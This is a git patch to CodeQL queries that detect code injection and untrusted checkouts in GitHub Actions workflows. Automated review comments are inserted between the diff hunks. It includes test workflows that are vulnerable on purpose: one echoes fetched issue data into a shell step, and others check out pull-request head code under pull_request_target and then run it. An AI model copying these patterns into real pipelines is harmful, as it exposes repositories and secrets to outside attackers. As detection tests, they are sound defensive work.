From da10ee74d353765cd60180afc8899ff7038614cb Mon Sep 17 00:00:00 2001
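Review bot: `isNotSemVer` has no QLDoc, and the regex it wraps is looser than semantic versioning — it accepts an optional `v`, any number of dot-separated numeric components and a trailing `.x`/`.X` wildcard (so `v1`, `1.2.3.4` and `2.x` all match) — so the name overstates what is checked. Document it, e.g. `/** Holds if `version` is not a numeric version tag: optional `v`, dot-separated digits, optional `.x` wildcard (e.g. `v1`, `1.2.3`, `2.x`). */`. Stylistically, a positive `isSemVer(string version)` negated at the call site (`not isSemVer(this.getVersion())`) reads better than a predicate whose name carries the negation, and leaves the `not` visible in the class where the alert condition lives.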
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 11:18:42 +0200 Subject: [PATCH 605/707] Add workflow_dispatch and scheduled to the list of privileged and external (user interaction) events --- .../codeql/actions/dataflow/FlowSources.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 38 +++++-- ql/lib/ext/config/context_event_map.yml | 2 - .../config/externally_triggereable_events.yml | 3 +- .../ext/config/untrusted_event_properties.yml | 3 - .../CWE-829/UntrustedCheckoutCritical.ql | 6 +- .../CWE-078/CommandInjectionCritical.expected | 7 -- .../CWE-078/CommandInjectionMedium.expected | 9 -- .../CWE-094/.github/workflows/test18.yml | 33 ++++++ .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 3 + .../CWE-829/.github/workflows/test19.yml | 22 ++++ .../CWE-829/.github/workflows/test20.yml | 22 ++++ .../.github/workflows/untrusted_checkout.yml | 18 +++- .../.github/workflows/untrusted_checkout4.yml | 49 --------- .../UntrustedCheckoutCritical.expected | 102 +++++++++--------- .../CWE-829/UntrustedCheckoutHigh.expected | 4 + .../CWE-829/UntrustedCheckoutMedium.expected | 4 - 18 files changed, 195 insertions(+), 139 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b79a86ce27ac..91b110f87eee 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -40,9 +40,10 @@ class GitHubCtxSource extends RemoteFlowSource {
 
 class GitHubEventCtxSource extends RemoteFlowSource {
   string flag;
+  string context;
 
   GitHubEventCtxSource() {
-    exists(Expression e, string context, string regexp |
+    exists(Expression e, string regexp |
       this.asExpr() = e and
       context = e.getExpression() and
       (
@@ -62,6 +63,8 @@ class GitHubEventCtxSource extends RemoteFlowSource {
   }
 
   override string getSourceType() { result = flag }
+
+  string getContext() { result = context }
 }
 
 abstract class CommandSource extends RemoteFlowSource {
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index c9a78f6d0b6b..336afdc73b15 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -197,9 +197,23 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt
   ActionsMutableRefCheckout() {
     this.getCallee() = "actions/checkout" and
     (
-      exists(ActionsMutableRefCheckoutFlow::PathNode sink |
-        ActionsMutableRefCheckoutFlow::flowPath(_, sink) and
-        sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"])
+      exists(
+        ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink
+      |
+        ActionsMutableRefCheckoutFlow::flowPath(source, sink) and
+        sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and
+        (
+          not source.getNode() instanceof GitHubEventCtxSource
+          or
+          source.getNode() instanceof GitHubEventCtxSource and
+          // the context is available for the job trigger events
+          exists(string context, string context_prefix |
+            contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(),
+              context_prefix) and
+            context = source.getNode().(GitHubEventCtxSource).getContext() and
+            normalizeExpr(context).matches("%" + context_prefix + "%")
+          )
+        )
       )
       or
       // heuristic base on the step id and field name
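Review bot: The new public member `string getContext() { result = context }` in the second FlowSources.qll hunk has no QLDoc, and `context` is now a class field whose value is only understandable from the characteristic predicate (`context = e.getExpression()`), which is partly outside the hunk. Add `/** Gets the context expression string (`e.getExpression()`) this source was matched on. */` above the getter, and a short `// expression text of the matched `github.event...` access` on the new `string context;` field, so a reader of the class does not have to trace the binding. The `GitHubEventCtxSource` class starts before the first hunk and its constructor body continues past it.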
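Review bot: The trigger-context filter added inside `exists(... source, ... sink | ...)` in `ActionsMutableRefCheckout()` — from `not source.getNode() instanceof GitHubEventCtxSource` through the closing `)` — is repeated verbatim in the `ActionsSHACheckout` hunk that follows (`@@ -241,9 +255,21 @@`), differing only in the flow module of the path nodes; since both branches use nothing but `source.getNode()` and `this`, extract it into one predicate over the step and the node and call it from both constructors, moving the comment `// the context is available for the job trigger events` onto that predicate as QLDoc. Note that `getATriggerEvent()` ranges over every trigger of the workflow, so in a multi-trigger workflow the check can be satisfied by a trigger other than the one an alert is later reported on; whether that is intended is not visible here. The node parameter type is whatever `source.getNode()` returns (`DataFlow::Node` in the usual library layout — confirm). The `ActionsMutableRefCheckout` constructor continues past the end of the hunk.
```ql
      exists(
        ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink
      |
        ActionsMutableRefCheckoutFlow::flowPath(source, sink) and
        sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and
        sourceContextMatchesTrigger(this, source.getNode())
      )
      // … unchanged: heuristic on the step id and field name …

/**
 * Holds if `source` is not a `GitHubEventCtxSource`, or it is one whose context
 * is listed by `contextTriggerDataModel` for some trigger event of `step`'s workflow.
 */
predicate sourceContextMatchesTrigger(UsesStep step, DataFlow::Node source) {
  not source instanceof GitHubEventCtxSource
  or
  source instanceof GitHubEventCtxSource and
  exists(string context, string context_prefix |
    contextTriggerDataModel(step.getEnclosingWorkflow().getATriggerEvent().getName(),
      context_prefix) and
    context = source.(GitHubEventCtxSource).getContext() and
    normalizeExpr(context).matches("%" + context_prefix + "%")
  )
}
```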
@@ -241,9 +255,21 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep {
   ActionsSHACheckout() {
     this.getCallee() = "actions/checkout" and
     (
-      exists(ActionsSHACheckoutFlow::PathNode sink |
-        ActionsSHACheckoutFlow::flowPath(_, sink) and
-        sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"])
+      exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink |
+        ActionsSHACheckoutFlow::flowPath(source, sink) and
+        sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) and
+        (
+          not source.getNode() instanceof GitHubEventCtxSource
+          or
+          source.getNode() instanceof GitHubEventCtxSource and
+          // the context is available for the job trigger events
+          exists(string context, string context_prefix |
+            contextTriggerDataModel(this.getEnclosingWorkflow().getATriggerEvent().getName(),
+              context_prefix) and
+            context = source.getNode().(GitHubEventCtxSource).getContext() and
+            normalizeExpr(context).matches("%" + context_prefix + "%")
+          )
+        )
       )
       or
       // heuristic base on the step id and field name
diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml
index 4c2451b5ab85..a5e8ced2e9ed 100644
--- a/ql/lib/ext/config/context_event_map.yml
+++ b/ql/lib/ext/config/context_event_map.yml
@@ -40,8 +40,6 @@ extensions:
       - ["push", "github.event.commits"]
       - ["push", "github.event.head_commit"]
       - ["push", "github.event.changes"]
-      - ["repository_dispatch", "github.event.client_payload"]
-      - ["workflow_dispatch", "github.event.inputs"]
       - ["workflow_run", "github.event.workflow"]
       - ["workflow_run", "github.event.workflow_run"]
       - ["workflow_run", "github.event.changes"]
diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml
index 028671c243dd..c3481c1cca5c 100644
--- a/ql/lib/ext/config/externally_triggereable_events.yml
+++ b/ql/lib/ext/config/externally_triggereable_events.yml
@@ -16,4 +16,5 @@ extensions:
       - ["pull_request_target"]
       - ["workflow_run"] # depending on branch filter
       - ["workflow_call"] # depending on caller
-
+      - ["workflow_dispatch"]
+      - ["scheduled"]
diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml
index be2e1c9c7981..1e54fa6eca3f 100644
--- a/ql/lib/ext/config/untrusted_event_properties.yml
+++ b/ql/lib/ext/config/untrusted_event_properties.yml
@@ -24,8 +24,6 @@ extensions:
       - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"]
       - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"]
       - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"]
-      - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"]
-      - ["github\\.event\\.client_payload", "text"]
       - ["github\\.event\\.changes\\.body\\.from", "title"]
       # BRANCH
       - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"]
@@ -59,7 +57,6 @@ extensions:
       # JSON
       - ["github", "json"]
       - ["github\\.event", "json"]
-      - ["github\\.event\\.client_payload", "json"]
       - ["github\\.event\\.comment", "json"]
       - ["github\\.event\\.commits", "json"]
       - ["github\\.event\\.discussion", "json"]
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 4b87ad00c0f4..84d85a998017 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
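Review bot: The new row `- ["scheduled"]` does not match the name GitHub Actions uses for the cron trigger, which is `schedule` (both the `on:` key and `github.event_name` are `schedule`), so it will never equal a workflow's trigger event name at lookup time unless the consumer normalises the name; the row should read `- ["schedule"]`. The neighbouring rows carry a trailing comment on why they are only conditionally external, and the two new rows deserve the same treatment, e.g. `- ["workflow_dispatch"] # manually dispatched; treated as externally triggerable` and `- ["schedule"] # cron trigger; treated as externally triggerable`, so the rationale in the commit message survives in the file. The `data:` list this hunk sits in starts before the hunk.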
@@ -47,6 +47,8 @@ where
   ) and
   // the checkout occurs in a privileged context
   inPrivilegedContext(poisonable, event) and
+  not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and
   not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout"))
-select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@",
-  event, event.getLocation().getFile().toString()
+select poisonable, checkout, poisonable,
+  "Execution of untrusted code on a privileged workflow ($@)", event,
+  event.getLocation().getFile().toString()
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
index b66822accab3..decabad082fb 100644
--- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
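Review bot: The added conjunct `not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and` has no comment, while the adjacent `inPrivilegedContext` line does; add `// neither the checkout nor the poisonable step is guarded by a control check` above the pair so the two near-identical lines read as one condition. Since they differ only in the protected step, a single `not exists(ControlCheck check | check.protects([checkout, poisonable], event, "untrusted-checkout"))` would state it once, provided `checkout` and `poisonable` share a declared type that `protects` accepts. The message change to `"... privileged workflow ($@)"` must be mirrored in every `#select` expectation; the `.expected` hunks visible in this commit only touch `edges`, so that cannot be confirmed here. The `where` clause starts before the hunk.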
@@ -1,13 +1,6 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 393dde04f356..99ebb1edc05d 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected 
@@ -1,14 +1,5 @@ edges -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes -| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | -| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | -| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. 
| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml new file mode 100644 index 000000000000..552ad866b5ae --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -0,0 +1,33 @@ +on: + workflow_dispatch: + +jobs: + fetch-issues: + runs-on: ubuntu-latest + steps: + - name: Fetch open issues + id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/foo/bar/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} + + - name: Write issues to file + run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + + - name: Setup Node.js + uses: actions/setup-node@v2 + with: + node-version: '14' + + - name: Print issue URLs + run: | + const fs = require('fs'); + const issues = JSON.parse(fs.readFileSync('issues.json', 'utf8')); + const filteredIssues = issues.filter(issue => issue.body.includes('Is your portal managed or self-hosted?\r\n\r\nManaged')); + for (const issue of filteredIssues) { + console.log(issue.html_url); + } + shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1ad0d4987917..83faf4eb5e44 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
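Review bot: The new fixture `test18.yml` does not say what it exercises; from the `CodeInjectionCritical.expected` hunk that follows, the intent appears to be that `echo '${{ steps.issues.outputs.data }}'` on line 18 is reported even though the only trigger is `workflow_dispatch`, which this commit adds to the externally-triggerable list. Add a first-line comment such as `# workflow_dispatch is treated as externally triggerable: the echo of steps.issues.outputs.data below is the expected sink` so the expectation is self-explaining. The last step is JavaScript under `shell: bash`; that is harmless in a static fixture but worth a word so it is not "fixed" later and the line numbers in the `.expected` files shift.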
@@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -639,6 +642,7 @@ subpaths | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index eb852fdd4d29..15d526ca7b4d 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -159,6 +159,7 @@ edges | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -484,6 +485,8 @@ nodes | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml new file mode 100644 index 000000000000..c4f90b97d05b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml new file mode 100644 index 000000000000..942b17967d32 --- /dev/null 
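Review bot: `test19.yml` and the `test20.yml` that follows it are identical except for `ref: ${{ github.event.pull_request.head.ref }}` versus `head.sha`, and neither states the outcome it is meant to pin; the `UntrustedCheckoutCritical.expected` edges hunk in this commit lists both, but whether each should yield an alert is not readable from the fixtures themselves. Add a first-line comment to each, e.g. `# pull_request_target with a label control check; checkout of head.ref (mutable ref)` for test19 and `# same as test19 but checkout of head.sha (immutable)` for test20. Both are new files, so the hunk is the whole fixture.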
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 1160497a4a38..15d4813c40e9 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -1,15 +1,25 @@ on: - pull_request_target + pull_request_target: jobs: - build: + test1: runs-on: ubuntu-latest - env: - HEAD: ${{ github.event.pull_request.head.sha }} steps: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + test2: + runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index 5494d97797e2..7e154502c139 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml 
@@ -1,34 +1,8 @@ -name: Auto Bump Versions - on: issue_comment: types: [created, edited] jobs: - add-same-version-label-to-pr: - runs-on: ubuntu-latest - if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label') - steps: - - uses: actions/checkout@v3 - - name: Add same version label - uses: actions/github-script@v6 - if: success() - with: - github-token: ${{secrets.GITHUB_TOKEN}} - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['same version'] - }) - github.rest.issues.createComment({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - body: '👋 Added [same version] label :)!' - }) - build: if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') runs-on: ubuntu-latest @@ -75,26 +49,3 @@ jobs: run: | ./version.sh -u -p echo "BUMP_TYPE=patch" >> $GITHUB_ENV - - - name: Add labels - uses: actions/github-script@v6 - if: ${{ env.BUMP_TYPE }} - with: - script: | - github.rest.issues.addLabels({ - issue_number: context.issue.number, - owner: context.repo.owner, - repo: context.repo.repo, - labels: ['version/${{ env.BUMP_TYPE }}'] - }) - - - name: Push Changes - if: ${{ env.BUMP_TYPE }} - run: | - git config user.name 'github-actions[bot]' - git config user.email 'github-actions[bot]@users.noreply.github.com' - git pull - git add . - git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff - git push - diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index baf354179b3e..237928fc8927 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
